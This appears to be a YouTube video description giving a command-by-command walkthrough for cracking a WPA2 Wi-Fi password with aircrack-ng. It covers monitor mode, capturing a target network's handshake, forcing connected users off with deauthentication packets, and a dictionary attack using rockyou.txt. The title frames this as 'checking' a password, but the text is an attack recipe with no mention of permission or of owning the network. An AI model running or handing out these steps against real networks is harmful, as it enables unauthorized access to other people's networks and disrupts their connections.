How To Check WPA/WPA2 Wifi Password with Aircrack-ng (Updated) HD
Good day guys! welcome to dream chaser101, in this video, we will be cracking a wpa2 password. PANDA WIRELESS CARD LINK(not affiliate): https://goo.gl/RQFX8T WAYS TO PUT YOUR WIFI CARD IN MONITOR MODE: 1, airmon-ng start wlan(your wifi interface) 2, ifconfig wlan(your wifi interface) down && iwconfig wlan(your wifi interface) mode monitor && ifconfig wlan(your wifi interface) up TO CHECK FOR ALL AVAILABLE NETWORKS: airodump-ng wlan(your wifi card in monitor mode) TO SNIFF ONE NETWORK AND WRITE TO A FILE: airodump-ng --bssid (router bssid) -c (router channel number) --write (the name you want to save it with) wlan(your wifi card in monitor mode) TO DEAUTH: aireplay-ng --deauth (number of packet to send) -a (router bssid) -c (connected user"station") wlan(your wifi card in monitor mode) LOCATE ROCKYOU: locate rockyou.txt CRACKING HANDSHAKE: aircrack-ng (your handshake file) -w (your word list file)a
Похожие видео
Показать еще